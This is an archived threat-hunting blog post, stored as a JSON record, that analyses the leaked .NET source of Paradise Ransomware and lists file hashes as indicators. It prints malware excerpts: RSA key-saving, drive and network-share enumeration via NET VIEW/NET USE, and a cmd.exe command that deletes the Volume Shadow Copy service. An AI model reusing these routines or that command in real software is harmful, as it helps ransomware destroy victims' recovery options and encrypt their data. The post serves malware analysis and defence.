{
	"id": "e1be6491-3def-408f-86f4-1da8a773c3a9",
	"created_at": "2026-04-06T01:30:37.487007Z",
	"updated_at": "2026-04-10T13:12:28.965079Z",
	"deleted_at": null,
	"sha1_hash": "240a6743e25ebd178655217e419430420069f1f0",
	"title": "Malware source code investigation: Paradise Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2271128,
	"plain_text": "Malware source code investigation: Paradise Ransomware\r\nBy MSSP Research Lab\r\nPublished: 2023-06-23 · Archived: 2026-04-06 00:18:39 UTC\r\nParadise Ransomware is a type of malware that encrypts the files on the victims’ systems and then demands a\r\nransom to recover the data. This ransomware family first appeared in 2017 and continues to be active with\r\nnumerous variants identified over the years. The ransomware typically targets Windows operating systems, and it\r\nis distributed through multiple infection vectors, including malicious email attachments, compromised Remote\r\nDesktop Protocol (RDP), and exploit kits.\r\nOn June 12, 2021, the source code for Paradise Ransomware was exposed on a Russian hacker forum on the dark\r\nweb. After several iterations, the Ransomware became more robust by implementing RSA encryption, which made\r\ndecryption impossible without the private key.\r\nProject evolutionPermalink\r\nParadise versions in 2017-2020:\r\nInitial version of Paradise, which could be decrypted because of an encryption flaw\r\nParadise.NET: a secure.net version that encrypts files with RSA\r\nParadiseB29 is a variant employed by a “team” that encrypts only the file’s conclusion.\r\nThe leaked source code is written on .NET , and when it is given the opportunity to operate in a local and\r\nvirtualized environment, it runs smoothly and without issue on a basic version of the .NET framework in\r\nhttps://mssplab.github.io/threat-hunting/2023/06/23/src-paradise.html\r\nPage 1 of 10\n\nMicrosoft Visual Studio.\r\nThe leaked folder structure is simple:\r\nThe ransom note of the new version is as follows:\r\nhttps://mssplab.github.io/threat-hunting/2023/06/23/src-paradise.html\r\nPage 2 of 10\n\nBuilderPermalink\r\nOver the source code it’s easy to find developer comments in Russian language =^..^=.\r\nMALIKA is the username for the building computer. Microsoft Visual Studio permits the user who compiles source\r\ncode into binary to provide certain information. The image below displays the username used to compile the\r\nproject.\r\nMalika (ملك (- arabic female given name meaning “queen”\r\nConfiguration:\r\nhttps://mssplab.github.io/threat-hunting/2023/06/23/src-paradise.html\r\nPage 3 of 10\n\nAs you can see, it should be configured by inserting configuration statements directly into the source code.\r\nThis ransomware have just one main form MainForm , as a result, DP_Builder ’s interface after compilation and\r\nexecution looks like this:\r\nTo generate a random RSA encryption vector, click Generate . Extension of the name of the encrypted file\r\n(Russian Расширение ). Address of the ransomware’s server, used for data collection. Administrator key that is\r\nextraneous to encryption and is used to identify the builder user.\r\nhttps://mssplab.github.io/threat-hunting/2023/06/23/src-paradise.html\r\nPage 4 of 10\n\nSite and Admin key values are stored in Server.info . When re-executed, the constructor will read these values\r\nfrom the file and automatically populate the fields.\r\nThe source code for DP_Builder ’s main program, decrypter, and private key generator is contained in the\r\nresource file. At the time of package creation, random 1024-bit RSA keys are generated and the ransomware’s\r\nprivate key is embedded. This guarantees a particular level of encryption security.\r\nInteresting trick: if there are no keys in the system (host), Paradise Ransomware generates and stores them on the\r\nlocal machine. Unfortunately, the method for storing private keys on disk encrypts them effectively, but there is\r\nstill work to be done here. The mechanism used by this Ransomware version to handle keys is the most intriguing\r\naspect for analysis. The following image depicts the SavePrivateKey function, which does not do what you\r\nexpect:\r\nprivate static void SavePrivateKey()\r\n{\r\n List\u0026lt;byte[]\u0026gt; master = new List\u0026lt;byte[]\u0026gt;();\r\n byte[] masterbytes = Encoding.Default.GetBytes(RSA_Private);\r\n int iterations = Convert.ToInt32(Math.Ceiling((double)masterbytes.Length / 117));\r\nhttps://mssplab.github.io/threat-hunting/2023/06/23/src-paradise.html\r\nPage 5 of 10\n\nint k = 0;\r\n for (int i = 0; i \u0026lt; iterations; i++)\r\n {\r\n byte[] b = new byte[117];\r\n for (int j = 0; j \u0026lt; 117; j++)\r\n {\r\n if (masterbytes.Length \u0026gt; k)\r\n {\r\n b[j] = masterbytes[k];\r\n k++;\r\n }\r\n }\r\n master.Add(b);\r\n }\r\n string strBytes = \"\";\r\n foreach (byte[] bts in master)\r\n {\r\n byte[] encrypted = MasterRSA.Encrypt(bts, false);\r\n strBytes += Encoding.Default.GetString(encrypted);\r\n }\r\n strBytes = Convert.ToBase64String(Encoding.Default.GetBytes(strBytes));\r\n CryptedPrivateKey = strBytes;\r\n strBytes += \"\\n\" + RSA_Public;\r\n if(KeyValidity())\r\n {\r\n SaveKeysToFiles(strBytes);\r\n LockerForValidKey = false;\r\n }\r\n}\r\nSavePrivateKey genuinely saves a combination of encrypted (private) key and public RSA key, as depicted in\r\nthe preceding code. In fact, it then executes a new function called SavekeysToFiles , which saves the keys in a\r\nfile named DecryptionInfo.auth .\r\nOf course, the ransomware contains standard functions for this type of malware like GetDrives :\r\nprivate static void GetDrives()\r\n{\r\n try\r\n {\r\n DriveInfo[] allDrives = DriveInfo.GetDrives();\r\n bool c_contain = false;\r\n foreach (DriveInfo drive in allDrives)\r\n {\r\n if (drive.Name.Contains(\"C:\\\\\")) c_contain = true;\r\n else\r\nhttps://mssplab.github.io/threat-hunting/2023/06/23/src-paradise.html\r\nPage 6 of 10\n\n{\r\n if(!Drives.Contains(drive.Name))\r\n {\r\n Drives.Enqueue(drive.Name);\r\n }\r\n }\r\n }\r\n if (c_contain) Drives.Enqueue(\"C:\\\\\");\r\n return;\r\n }\r\n catch (Exception ex)\r\n {\r\n return;\r\n }\r\n}\r\nand GetNetwork :\r\nprivate static void GetNetwork()\r\n{\r\n List\u0026lt;string\u0026gt; Network = new List\u0026lt;string\u0026gt;();\r\n try\r\n {\r\n string result = DoCMD(\"NET VIEW\");\r\n string[] resultList = result.Replace(\"\\r\\n\", \"\\n\").Split('\\n');\r\n foreach (string line in resultList)\r\n {\r\n if (line.Contains(@\"\\\\\"))\r\n {\r\n Network.Add(line.Split(' ')[0]);\r\n }\r\n }\r\n }\r\n catch (Exception) {}\r\n try\r\n {\r\n string result = DoCMD(\"NET USE\").Replace(\"\\r\\n\", \"\\n\");\r\n string[] resultList = result.Split('\\n');\r\n foreach (string line in resultList)\r\n {\r\n string drive = new Regex(@\"\\s(\\S{2})\\s\").Match(line).Groups[1].Value;\r\n if(!Drives.Contains(drive+\"\\\\\") \u0026amp;\u0026amp; drive.Contains(\":\")) Drives.Enqueue(drive + \"\\\\\");\r\n string NetResource = new Regex(@\"(\\\\\\\\[^\\\\\\s]*)\", RegexOptions.IgnoreCase).Match(line).Groups[1].Val\r\n if (NetResource != \"\")\r\n {\r\n if(!Network.Contains(NetResource)) Network.Add(NetResource);\r\nhttps://mssplab.github.io/threat-hunting/2023/06/23/src-paradise.html\r\nPage 7 of 10\n\n}\r\n }\r\n }\r\n catch(Exception) {}\r\n foreach (string device in Network)\r\n {\r\n try\r\n {\r\n string result = DoCMD(\"NET VIEW \" + device);\r\n string[] resultList = result.Replace(\"\\r\\n\", \"\\n\").Split('\\n');\r\n foreach (string line in resultList)\r\n {\r\n if (line.Contains(\"Disk\"))\r\n {\r\n string folder = BackspacesCleaner(line);\r\n Drives.Enqueue(device + \"\\\\\" + folder);\r\n }\r\n }\r\n }\r\n catch(Exception) {}\r\n }\r\n}\r\nEliminating shadow duplicates is a fairly common practice for ransomware. Even in this instance, executing the\r\nfollowing command in cmd.exe is fairly standard:\r\nProcessStartInfo psiOpt = new ProcessStartInfo(@\"cmd.exe\", @\"/C sc delete VSS\");\r\nhttps://mssplab.github.io/threat-hunting/2023/06/23/src-paradise.html\r\nPage 8 of 10\n\nFinally, the method by which Paradise encrypts files is yet another strange feature. The ability to encrypt “only”\r\nthe first 10MB of large files is a dubious decision by the malware author. If the files are smaller, they are divided\r\ninto 117-byte chunks and iterated over.\r\nIOCsPermalink\r\nSHA-256 of the analyzed files composing the leaked source code:\r\n363a99b2480c11b9431c046d44b323807e9b11bf237cc291dde11151d8b75581 ./MainForm.cs\r\n753f1e353ad0eb75555f81e090a3e89339d96266f5e33e2ada34c9ea655dcee9 ./AssemblyInfo.cs\r\nbdbf6eb3afe9056e474d2ca2bec98a866c17b8a66405d1463fc9e8b8a832a65c ./obj/Debug/.NETFramework,Version=v4.5.Assembl\r\n6a5c52609d64d0c611b6d0e083f5c8489f8b7e4ff8fbbf4e710b163b1d34d6b3 ./obj/Debug/DP_Builder.csprojAssemblyReference\r\n45ce1722ae08d1ddd4ae590c2ba55dd1a8d61513cb490879ddca1426e8b84983 ./obj/Debug/DesignTimeResolveAssemblyReference\r\nhttps://mssplab.github.io/threat-hunting/2023/06/23/src-paradise.html\r\nPage 9 of 10\n\nab69b565a381aca056b91dda7eacdb507de078f9f98bf263c5414a5842361e9a ./obj/Debug/DesignTimeResolveAssemblyReference\r\n5eb2c22d092f3bf2077d7e9128c38c1bc29fd0b06479646c05afb0bf741891dc ./MainForm.resx\r\n07958ee0ed74c8e4637d0903d686e66e7bd9e6b89bca0d3df4531d590c848a05 ./Properties/Settings.cs\r\ne9ae7a5837b34b65608964e7315450a3459e0e01366769b68b904504a55db102 ./Properties/Resources.resx\r\na1428e2c84c3420a0481e524e103db7fde84d2107bd02738349c48ee4d6a5353 ./Properties/Resources.cs\r\n0dfb6a940a583432f21ce03634c0e8d6a9030443e391cf44f9581212716d4308 ./DP_Builder.sln\r\nf282d765bb83d76be318a2a982605d06619da2376165ba12cc6ca4e50aa0754d ./Program.cs\r\ne375edc127182453ad7ed84ae3abac3759dded7265284af48015a165e439f26c ./DP_Builder.csproj\r\nConclusionPermalink\r\nThe leaked source code of the Paradise Ransomware provides an invaluable insight into the working mechanisms\r\nof this persistent threat. The variant in question is written in .NET, highlighting the shift in language preference by\r\nthreat actors for its simplicity and extensive library support. Although it would seem that now the threat is already\r\nless, but still, even today there are such ransomes as Rapture, a Ransomware Family With Similarities to Paradise\r\nBy Cyber Threat Hunters from MSSPLab:\r\n@cocomelonc\r\n@wqkasper\r\n@mgmadr\r\nReferencesPermalink\r\nhttps://github.com/TheBadKitten/Paradise-Ransomware\r\nhttps://github.com/vxunderground/MalwareSourceCode/tree/main/Win32/Ransomware\r\nhttps://malpedia.caad.fkie.fraunhofer.de/details/win.paradise\r\nRapture, a Ransomware Family With Similarities to Paradise\r\nThanks for your time happy hacking and good bye!\r\nAll drawings and screenshots are MSSPLab’s\r\nSource: https://mssplab.github.io/threat-hunting/2023/06/23/src-paradise.html\r\nhttps://mssplab.github.io/threat-hunting/2023/06/23/src-paradise.html\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://mssplab.github.io/threat-hunting/2023/06/23/src-paradise.html"
	],
	"report_names": [
		"src-paradise.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775439037,
	"ts_updated_at": 1775826748,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/240a6743e25ebd178655217e419430420069f1f0.pdf",
		"text": "https://archive.orkl.eu/240a6743e25ebd178655217e419430420069f1f0.txt",
		"img": "https://archive.orkl.eu/240a6743e25ebd178655217e419430420069f1f0.jpg"
	}
}